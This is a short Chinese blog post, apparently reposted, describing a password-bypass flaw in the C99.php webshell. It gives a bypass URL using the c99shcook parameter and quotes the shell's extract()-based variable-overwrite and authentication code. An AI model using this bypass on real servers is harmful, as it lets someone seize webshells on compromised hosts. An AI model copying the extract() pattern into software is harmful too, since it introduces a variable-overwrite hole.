From: Every C99.php Shell Is Backdoored (A.K.A. Free Shells for Everyone!)
C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。
http://127.0.0.1/c99.php?c99shcook
此处为隐藏的内容
注册登录后,方可查看
登录
可直接登陆。
@extract($_REQUEST["c99shcook"]);
变量覆盖
if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html)); } header("WWW-Authenticate: Basic realm="c99shell " . $shver . ": " . $login_txt . """); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } }
留言评论(旧系统):
文章来源于lcx.cc:C99.PHP webshell 绕过登陆密码漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论